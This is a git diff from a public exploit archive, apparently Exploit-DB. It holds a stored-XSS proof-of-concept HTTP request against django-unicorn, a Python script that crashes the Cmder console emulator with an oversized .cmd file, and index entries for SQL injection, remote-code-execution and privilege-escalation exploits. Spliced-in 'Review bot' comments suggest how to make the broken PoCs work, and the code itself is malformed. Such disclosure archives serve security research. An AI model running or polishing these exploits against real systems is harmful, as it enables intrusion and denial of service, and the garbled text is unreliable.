+Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).
+
+
+POC:
+
+POST /unicorn/message/todo HTTP/2
+Host: www.django-unicorn.com
+Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
+Content-Length: 258
+Sec-Ch-Ua: "";Not A Brand"";v=""99"", ""Chromium"";v=""94""
+Sec-Ch-Ua-Mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Content-Type: text/plain;charset=UTF-8
+Accept: application/json
+X-Requested-With: XMLHttpRequest
+X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
+Sec-Ch-Ua-Platform: ""Linux""
+Origin: https://www.django-unicorn.com
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://www.django-unicorn.com/examples/todo
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+
+{""id"":""Q43GSmJh"",""data"":{""task"":"""",""tasks"":[]},""checksum"":""4ck2yTwX"",""actionQueue"":[{""type"":""syncInput"",""payload"":{""name"":""task"",""value"":""""}},{""type"":""callMethod"",""payload"":{""name"":""add""},""partial"":{}}],""epoch"":1633578678871}
+
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+HTTP/2 200 OK
+Date: Thu, 07 Oct 
2021 03:51:18 GMT
+Content-Type: application/json
+X-Frame-Options: DENY
+X-Content-Type-Options: nosniff
+Referrer-Policy: same-origin
+Via: 1.1 vegur
+Cf-Cache-Status: DYNAMIC
+Expect-Ct: max-age=604800, report-uri=""https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct""
+Report-To: {""endpoints"":[{""url"":""https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y""}],""group"":""cf-nel"",""max_age"":604800}
+Nel: {""success_fraction"":0,""report_to"":""cf-nel"",""max_age"":604800}
+Server: cloudflare
+Cf-Ray: 69a42b973f6a6396-ORD
+Alt-Svc: h3="":443""; ma=86400, h3-29="":443""; ma=86400, h3-28="":443""; ma=86400, h3-27="":443""; ma=86400
+
+{""id"": ""Q43GSmJh"", ""data"": {""tasks"": [""""]}, ""errors"": {}, ""checksum"": ""ZQn54Ct4"", ""dom"": ""
\n
\n\n
\n\n

\n

\n\n

\n
\n"", ""return"": {""method"": ""add"", ""params"": [], ""value"": null}}" +"ENDTEXT" \ No newline at end of file diff --git a/exploits/windows/local/50401.txt b/exploits/windows/local/50401.txt new file mode 100644 index 000000000..533d76c13 --- /dev/null +++ b/exploits/windows/local/50401.txt @@ -0,0 +1,24 @@ +# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC) +# Date: 2021-10-07 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://cmder.net +# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip +# Version: v1.3.18 +# Tested on: Windows 10 + +# [About - Cmder Console Emulator] : + +#Cmder is a software package created over absence of usable console emulator on Windows. +#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout. + +# [Security Issue] : + +#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition. +#E.g λ cmder.cmd + +# [POC] : + +PAYLOAD=chr(235) + "\\CMDER" +PAYLOAD = PAYLOAD * 3000 +with open("cmder.cmd", "w") as f: +f.write(PAYLOAD) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e5b9a8e7e..92625a71f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
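Review bot: The committed file is a CSV-escaped export rather than the raw advisory: every double quote is doubled (`{""id"":""Q43GSmJh"",...`, `Sec-Ch-Ua-Platform: ""Linux""`) and it ends with a stray `"ENDTEXT"` token, so the JSON body cannot be replayed as-is and the quotes need un-doubling before publication. The request also carries no payload: both the `syncInput` value (`""value"":""""`) and the echoed `tasks` (`[""""]`) are empty strings, and the un-doubled body is about 225 bytes against the declared `Content-Length: 258`, so roughly 30 bytes — presumably the HTML payload, stripped as markup — are missing and the PoC demonstrates nothing until the payload is spelled out (URL- or base64-encoded if needed). The `csrftoken`/`X-Csrftoken` value is per-session on the vendor's demo site, so the write-up should say it has to be fetched from `/examples/todo` first.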
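Review bot: `f.write(PAYLOAD)` appears at column 0 directly after `with open("cmder.cmd", "w") as f:`, which is an `IndentationError` as written; if the indent was lost in transit it needs restoring, otherwise the PoC does not run. Writing `chr(235)` through a text-mode handle makes the file depend on the locale encoding (one byte `EB` under cp1252, two bytes `C3 AB` under UTF-8), so `open("cmder.cmd", "wb")` with `PAYLOAD = (b"\xeb" + b"\\CMDER") * 3000` would make it deterministic. The write-up asserts a 'buffer overflow condition' but shows no crash output, faulting module or register state; without that, only the crash in the title (DoS) is supported and the overflow claim should be softened or evidenced.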
@@ -11396,6 +11396,7 @@ id,file,description,date,author,type,platform,port
 50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
+50401,exploits/windows/local/50401.txt,"Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44502,3 +44503,14 @@ id,file,description,date,author,type,platform,port
 50388,exploits/php/webapps/50388.txt,"Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)",1970-01-01,snup,webapps,php,
 50389,exploits/php/webapps/50389.txt,"Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)",1970-01-01,snup,webapps,php,
 50390,exploits/php/webapps/50390.txt,"Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mevlüt Yılmaz",webapps,php,
+50391,exploits/php/webapps/50391.txt,"IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)",1970-01-01,"Yash Mahajan",webapps,php,
+50392,exploits/php/webapps/50392.txt,"Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated)",1970-01-01,snup,webapps,php,
+50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Raven Security Associates",webapps,python,
+50394,exploits/php/webapps/50394.py,"Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,DreyAnd,webapps,php,
+50395,exploits/php/webapps/50395.txt,"WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)",1970-01-01,Lotfi13-DZ,webapps,php,
+50396,exploits/php/webapps/50396.txt,"Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation",1970-01-01,"Amine ismail",webapps,php,
+50397,exploits/php/webapps/50397.txt,"Simple Online College Entrance Exam System 1.0 - Account Takeover",1970-01-01,"Amine ismail",webapps,php,
+50398,exploits/php/webapps/50398.txt,"Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection",1970-01-01,"Amine ismail",webapps,php,
+50399,exploits/php/webapps/50399.txt,"Online Enrollment Management System 1.0 - Authentication Bypass",1970-01-01,"Amine ismail",webapps,php,
+50400,exploits/php/webapps/50400.txt,"Online Employees Work From Home Attendance System 1.0 - SQLi Authentication 
Bypass",1970-01-01,"Merve Oral",webapps,php,
+50402,exploits/php/webapps/50402.txt,"Loan Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Merve Oral",webapps,php,